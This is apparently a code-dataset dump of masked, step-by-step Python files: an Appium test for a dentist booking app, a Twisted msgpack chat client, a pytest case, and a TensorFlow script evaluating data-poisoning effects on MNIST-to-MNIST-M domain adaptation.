"step-1": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\n<mask token>\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-3": "<mask token>\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-4": "import swipe\n\n\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()\n driver.find_element_by_name('23:00').click()\n driver.find_element_by_name('00').click()\n driver.find_element_by_name('15分钟').click()\n driver.find_element_by_name('完成').click()\n\n\ndef data(driver):\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()\n driver.find_element_by_name('完成').click()\n\n\ndef patient(driver):\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\n\n\ndef site(driver):\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()\n driver.find_element_by_id('com.dentist.android:id/select_city_layout'\n ).click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\n\n\ndef project(driver):\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n",
"step-5": "import swipe\ndef scheduleMultipoint(driver):\n driver.find_element_by_id('com.dentist.android:id/calendarBt').click()\n driver.find_element_by_id('com.dentist.android:id/addIb').click()\n\n\ndef time(driver):#就诊时间\n driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间\n driver.find_element_by_name('23:00').click()#时间\n driver.find_element_by_name('00').click()#分钟\n driver.find_element_by_name('15分钟').click()#时长\n driver.find_element_by_name('完成').click()\n\ndef data(driver):#就诊日期\n driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期\n driver.find_element_by_name('完成').click()\n\ndef patient(driver):#患者\n driver.find_element_by_id('com.dentist.android:id/patientLl').click()\n #driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')\n #driver.find_element_by_id('com.dentist.android:id/contactLl').click()\n driver.find_element_by_name('总校').click()\n driver.find_element_by_name('总校').click()\ndef site(driver):#就诊地点\n driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点\n driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()\n driver.find_element_by_name('北京市').click()\n driver.find_element_by_name('返回').click()\n driver.find_element_by_name('欢乐口腔(华贸分院)').click()\ndef project(driver):#治疗项目\n driver.find_element_by_name('牙位/治疗项目').click()\n driver.find_element_by_name('修复').click()\n driver.find_element_by_name('备牙').click()\n driver.find_element_by_name('保存').click()\n swipe.swipeUp(driver)\n driver.find_element_by_name('发起预约').click()\n driver.find_element_by_name('继续保存').click()\n\ndef subscribe(driver):\n patient(driver)\n data(driver)\n time(driver)\n site(driver)\n project(driver)\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
class StdIOFactory(Factory):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print('sending', nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
<|reserved_special_token_0|>
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print('sending', nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
def dataReceived(self, data):
self.unpacker.feed(data)
for msg in self.unpacker:
print('{}: {}'.format(*msg))
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
<|reserved_special_token_0|>
class StandardInput(LineReceiver, StandardIO):
"""
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
"""
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
<|reserved_special_token_1|>
from __future__ import print_function
import os
from twisted.internet.task import react
from twisted.internet.defer import Deferred, inlineCallbacks
from twisted.internet.protocol import Factory
from twisted.internet.protocol import Protocol
from twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol
from twisted.protocols.basic import LineReceiver
import msgpack
class ChatClient(Protocol):
def __init__(self, done):
self.done = done
self.unpacker = msgpack.Unpacker()
def connectionLost(self, reason):
print(reason.getErrorMessage())
self.done.callback(reason)
def sendMessage(self, nick, msg):
print("sending", nick, msg)
data = msgpack.packb([nick, msg])
self.transport.write(data)
def dataReceived(self, data):
# ditto to server: go over what about "burst" messages?
# (and do "original" code here at first: msg = msgpack.unpack(data)
self.unpacker.feed(data)
for msg in self.unpacker:
print("{}: {}".format(*msg))
class StdIOFactory(Factory):
def __init__(self, nick, proto):
self.nick = nick
self.proto = proto
def buildProtocol(self, addr):
return StandardInput(self.nick, self.proto)
from twisted.internet.stdio import StandardIO
class StandardInput(LineReceiver, StandardIO):
'''
Reads stdin and writes every line received as a message to the
server. No fancy editing or anything, simple pipe.
'''
delimiter = os.linesep
def lineReceived(self, line):
return self.protocol.sendMessage(self.nick, line)
def __init__(self, nick, proto):
self.nick = nick
self.protocol = proto
def connectionLost(self, reason):
self.protocol.transport.loseConnection()
|
flexible
|
{
"blob_id": "532bcf8ae0ee40dc3eb4bd7170acfcb5d21cc4b9",
"index": 1984,
"step-1": "<mask token>\n\n\nclass StdIOFactory(Factory):\n <mask token>\n <mask token>\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-2": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n <mask token>\n <mask token>\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-3": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print('sending', nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n <mask token>\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-4": "<mask token>\n\n\nclass ChatClient(Protocol):\n\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print('sending', nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n\n def dataReceived(self, data):\n self.unpacker.feed(data)\n for msg in self.unpacker:\n print('{}: {}'.format(*msg))\n\n\nclass StdIOFactory(Factory):\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\n<mask token>\n\n\nclass StandardInput(LineReceiver, StandardIO):\n \"\"\"\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n \"\"\"\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-5": "from __future__ import print_function\nimport os\n\nfrom twisted.internet.task import react\nfrom twisted.internet.defer import Deferred, inlineCallbacks\n\nfrom twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.endpoints import TCP4ClientEndpoint, connectProtocol\nfrom twisted.protocols.basic import LineReceiver\n\nimport msgpack\n\n\nclass ChatClient(Protocol):\n def __init__(self, done):\n self.done = done\n self.unpacker = msgpack.Unpacker()\n\n def connectionLost(self, reason):\n print(reason.getErrorMessage())\n self.done.callback(reason)\n\n def sendMessage(self, nick, msg):\n print(\"sending\", nick, msg)\n data = msgpack.packb([nick, msg])\n self.transport.write(data)\n\n def dataReceived(self, data):\n # ditto to server: go over what about \"burst\" messages?\n # (and do \"original\" code here at first: msg = msgpack.unpack(data)\n self.unpacker.feed(data)\n for msg in self.unpacker:\n print(\"{}: {}\".format(*msg))\n\n\nclass StdIOFactory(Factory):\n def __init__(self, nick, proto):\n self.nick = nick\n self.proto = proto\n\n def buildProtocol(self, addr):\n return StandardInput(self.nick, self.proto)\n\n\nfrom twisted.internet.stdio import StandardIO\nclass StandardInput(LineReceiver, StandardIO):\n '''\n Reads stdin and writes every line received as a message to the\n server. No fancy editing or anything, simple pipe.\n '''\n delimiter = os.linesep\n\n def lineReceived(self, line):\n return self.protocol.sendMessage(self.nick, line)\n\n def __init__(self, nick, proto):\n self.nick = nick\n self.protocol = proto\n\n def connectionLost(self, reason):\n self.protocol.transport.loseConnection()\n",
"step-ids": [
7,
12,
13,
14,
16
]
}
|
[
7,
12,
13,
14,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (
'11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'
), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10',
1, '0')])
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
<|reserved_special_token_1|>
from soln import Solution
import pytest
@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (
'11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'
), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10',
1, '0')])
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
<|reserved_special_token_1|>
from soln import Solution
import pytest
@pytest.mark.parametrize(
["inp1", "inp2", "res"],
[
("112", 1, "11"),
("11000002000304", 4, "4"),
("9119801020", 6, "20"),
("111111", 3, "111"),
("1432219", 3, "1219"),
("10200", 1, "200"),
("10", 2, "0"),
("10", 1, "0"),
],
)
def test_soln(inp1, inp2, res):
s = Solution()
assert s(inp1, inp2) == res
|
flexible
|
{
"blob_id": "7eb4efb64a5a5b2e8c2dfa965411ff4c7aad6e35",
"index": 6525,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (\n '11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'\n ), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10', \n 1, '0')])\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-3": "from soln import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(['inp1', 'inp2', 'res'], [('112', 1, '11'), (\n '11000002000304', 4, '4'), ('9119801020', 6, '20'), ('111111', 3, '111'\n ), ('1432219', 3, '1219'), ('10200', 1, '200'), ('10', 2, '0'), ('10', \n 1, '0')])\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-4": "from soln import Solution\nimport pytest\n\n\n@pytest.mark.parametrize(\n [\"inp1\", \"inp2\", \"res\"],\n [\n (\"112\", 1, \"11\"),\n (\"11000002000304\", 4, \"4\"),\n (\"9119801020\", 6, \"20\"),\n (\"111111\", 3, \"111\"),\n (\"1432219\", 3, \"1219\"),\n (\"10200\", 1, \"200\"),\n (\"10\", 2, \"0\"),\n (\"10\", 1, \"0\"),\n ],\n)\ndef test_soln(inp1, inp2, res):\n s = Solution()\n assert s(inp1, inp2) == res\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import sys
sys.path.append("../")
import numpy as np
import tensorflow as tf
from utils import eval_accuracy_main_cdan
from models import mnist2mnistm_shared_discrepancy, mnist2mnistm_predictor_discrepancy
import keras
import argparse
import pickle as pkl
parser = argparse.ArgumentParser(description='Training', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--USE_POISON', type=int, default=1, help='POISON used or not')
args = parser.parse_args()
USE_POISON = bool(args.USE_POISON)
METHOD = "mcd"
IMG_WIDTH = 28
IMG_HEIGHT = 28
NCH = 3
NUM_CLASSES_MAIN = 2
NUM_CLASSES_DC = 2
EPOCHS = 101
BATCH_SIZE = 64
PLOT_POINTS = 100
NUM_MODELS = 5
ce_loss = tf.keras.losses.CategoricalCrossentropy(from_logits=True)
shared = [mnist2mnistm_shared_discrepancy([50000, IMG_HEIGHT, IMG_WIDTH, NCH]) for i in range(NUM_MODELS)]
main_classifier_1 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]#48*4*4, 500
main_classifier_2 = [mnist2mnistm_predictor_discrepancy(shared[i], NUM_CLASSES_MAIN, 768) for i in range(NUM_MODELS)]
optimizer_shared = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
optimizer_main_classifier_1 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
optimizer_main_classifier_2 = [tf.keras.optimizers.Adam(1E-3, beta_1=0.5) for i in range(NUM_MODELS)]
@tf.function
def train_discrepancy_1(main_data, main_labels, target_data):
# persistent is set to True because the tape is used more than
# once to calculate the gradients.
with tf.GradientTape(persistent=True) as tape:
shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]
main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
main_loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]
shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]
target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for i in range(NUM_MODELS)]
loss = [main_loss[i] - adv_loss[i] for i in range(NUM_MODELS)]
gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]
gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]
[optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]
[optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]
return adv_loss
@tf.function
def train_discrepancy_2(target_data):
# persistent is set to True because the tape is used more than
# once to calculate the gradients.
with tf.GradientTape(persistent=True) as tape:
shared_target = [shared[i](target_data, training=True) for i in range(NUM_MODELS)]
target_logits_1 = [main_classifier_1[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
target_logits_2 = [main_classifier_2[i](shared_target[i], training=True) for i in range(NUM_MODELS)]
adv_loss = [tf.reduce_mean(tf.abs(tf.nn.softmax(target_logits_1[i]) - tf.nn.softmax(target_logits_2[i]))) for i in range(NUM_MODELS)]
gradients_shared = [tape.gradient(adv_loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]
[optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]
return adv_loss
@tf.function
def train_step_erm(main_data, main_labels):
# persistent is set to True because the tape is used more than
# once to calculate the gradients.
with tf.GradientTape(persistent=True) as tape:
shared_main = [shared[i](main_data, training=True) for i in range(NUM_MODELS)]
main_logits_1 = [main_classifier_1[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
main_logits_2 = [main_classifier_2[i](shared_main[i], training=True) for i in range(NUM_MODELS)]
loss = [ce_loss(main_labels, main_logits_1[i]) + ce_loss(main_labels, main_logits_2[i]) for i in range(NUM_MODELS)]
gradients_shared = [tape.gradient(loss[i], shared[i].trainable_variables) for i in range(NUM_MODELS)]
gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1[i].trainable_variables) for i in range(NUM_MODELS)]
gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2[i].trainable_variables) for i in range(NUM_MODELS)]
[optimizer_shared[i].apply_gradients(zip(gradients_shared[i], shared[i].trainable_variables)) for i in range(NUM_MODELS)]
[optimizer_main_classifier_1[i].apply_gradients(zip(gradients_main_classifier_1[i], main_classifier_1[i].trainable_variables)) for i in range(NUM_MODELS)]
[optimizer_main_classifier_2[i].apply_gradients(zip(gradients_main_classifier_2[i], main_classifier_2[i].trainable_variables)) for i in range(NUM_MODELS)]
return loss
mnist = tf.keras.datasets.mnist
(x_train_mnist_all, y_train_mnist_all), (x_test_mnist_all, y_test_mnist_all) = mnist.load_data()
x_train_mnist_all = np.stack((x_train_mnist_all,)*3, axis=-1)/255.
x_test_mnist_all = np.stack((x_test_mnist_all,)*3, axis=-1)/255.
mnistm = pkl.load(open('../../../../MNIST_MNIST-m/mnistm_data.pkl', 'rb'))
x_train_mnistm_all = mnistm['train']/255.
x_test_mnistm_all = mnistm['test']/255.
picked_class = 3
picked_class_next = 8
train_points_class_0 = np.argwhere(y_train_mnist_all == picked_class).flatten()
train_points_class_1 = np.argwhere(y_train_mnist_all == picked_class_next).flatten()
test_points_class_0 = np.argwhere(y_test_mnist_all == picked_class).flatten()
test_points_class_1 = np.argwhere(y_test_mnist_all == picked_class_next).flatten()
x_train_mnist = x_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]
y_train_mnist = y_train_mnist_all[np.concatenate([train_points_class_0, train_points_class_1])]
x_test_mnist = x_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]
y_test_mnist = y_test_mnist_all[np.concatenate([test_points_class_0, test_points_class_1])]
x_train_mnistm = x_train_mnistm_all[np.concatenate([train_points_class_0, train_points_class_1])]
x_test_mnistm = x_test_mnistm_all[np.concatenate([test_points_class_0, test_points_class_1])]
zeros_train = np.argwhere(y_train_mnist == picked_class).flatten()
ones_train = np.argwhere(y_train_mnist == picked_class_next).flatten()
zeros_test = np.argwhere(y_test_mnist == picked_class).flatten()
ones_test = np.argwhere(y_test_mnist == picked_class_next).flatten()
y_train_mnist[zeros_train] = 0
y_train_mnist[ones_train] = 1
y_test_mnist[zeros_test] = 0
y_test_mnist[ones_test] = 1
y_train_mnist = keras.utils.to_categorical(y_train_mnist, NUM_CLASSES_MAIN)
y_test_mnist = keras.utils.to_categorical(y_test_mnist, NUM_CLASSES_MAIN)
x_target_test = np.load("data/" + METHOD + "_TARGET_DATA.npy")
y_target_test = np.load("data/" + METHOD + "_TARGET_LABEL.npy")
y_target_test_incorrect_label = np.zeros([1, NUM_CLASSES_MAIN])
target_correct_label = np.argmax(y_target_test,1).flatten()[0]
y_target_test_incorrect_label[0][(target_correct_label+1)%NUM_CLASSES_MAIN]=1
if USE_POISON:
x_poison = np.load("data/" + METHOD + "_GENERATED_POISON_DATA.npy")
y_poison = np.load("data/" + METHOD + "_GENERATED_POISON_LABELS.npy")
x_train_mnist = np.concatenate([x_train_mnist, x_poison])
y_train_mnist = np.concatenate([y_train_mnist, y_poison])
for epoch in range(EPOCHS):
nb_batches_train = int(len(x_train_mnist)/BATCH_SIZE)
if len(x_train_mnist) % BATCH_SIZE != 0:
nb_batches_train += 1
ind_shuf = np.arange(len(x_train_mnist))
np.random.shuffle(ind_shuf)
for batch in range(nb_batches_train):
ind_batch = range(BATCH_SIZE * batch, min(BATCH_SIZE * (1+batch), len(x_train_mnist)))
ind_source = ind_shuf[ind_batch]
ind_target = np.random.choice(len(x_train_mnistm), size=len(ind_source), replace=False)
x_source_batch = x_train_mnist[ind_source]
y_source_batch = y_train_mnist[ind_source]
x_target_batch = x_train_mnistm[ind_target]
train_step_erm(x_source_batch, y_source_batch)
train_discrepancy_1(x_source_batch, y_source_batch, x_target_batch)
train_discrepancy_2(x_target_batch)
if epoch % 20 == 0:
print("Full training Poisoning:", USE_POISON, "MNIST->MNIST_M:", epoch, "METHOD:", METHOD, "\n")
print([eval_accuracy_main_cdan(x_target_test, y_target_test_incorrect_label, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
print([eval_accuracy_main_cdan(x_target_test, y_target_test, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
print([eval_accuracy_main_cdan(x_test_mnistm, y_test_mnist, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
if USE_POISON:
print([eval_accuracy_main_cdan(x_poison, y_poison, shared[i], main_classifier_1[i]) for i in range(NUM_MODELS)])
print("\n")
|
normal
|
{
"blob_id": "465d5baae8d5be77fbf3d550d10667da420a8fbe",
"index": 8608,
"step-1": "<mask token>\n\n\n@tf.function\ndef train_discrepancy_1(main_data, main_labels, target_data):\n with tf.GradientTape(persistent=True) as tape:\n shared_main = [shared[i](main_data, training=True) for i in range(\n NUM_MODELS)]\n main_logits_1 = [main_classifier_1[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_logits_2 = [main_classifier_2[i](shared_main[i], training=True\n ) for i in range(NUM_MODELS)]\n main_loss = [(ce_loss(main_labels, main_logits_1[i]) + ce_loss(\n main_labels, main_logits_2[i])) for i in range(NUM_MODELS)]\n shared_target = [shared[i](target_data, training=True) for i in\n range(NUM_MODELS)]\n target_logits_1 = [main_classifier_1[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n target_logits_2 = [main_classifier_2[i](shared_target[i], training=\n True) for i in range(NUM_MODELS)]\n adv_loss = [tf.reduce_mean(tf.reduce_mean(tf.abs(tf.nn.softmax(\n target_logits_1[i]) - tf.nn.softmax(target_logits_2[i])), 1)) for\n i in range(NUM_MODELS)]\n loss = [(main_loss[i] - adv_loss[i]) for i in range(NUM_MODELS)]\n gradients_main_classifier_1 = [tape.gradient(loss[i], main_classifier_1\n [i].trainable_variables) for i in range(NUM_MODELS)]\n gradients_main_classifier_2 = [tape.gradient(loss[i], main_classifier_2\n [i].trainable_variables) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_1[i].apply_gradients(zip(\n gradients_main_classifier_1[i], main_classifier_1[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n [optimizer_main_classifier_2[i].apply_gradients(zip(\n gradients_main_classifier_2[i], main_classifier_2[i].\n trainable_variables)) for i in range(NUM_MODELS)]\n return adv_loss\n\n\n<mask token>\n",
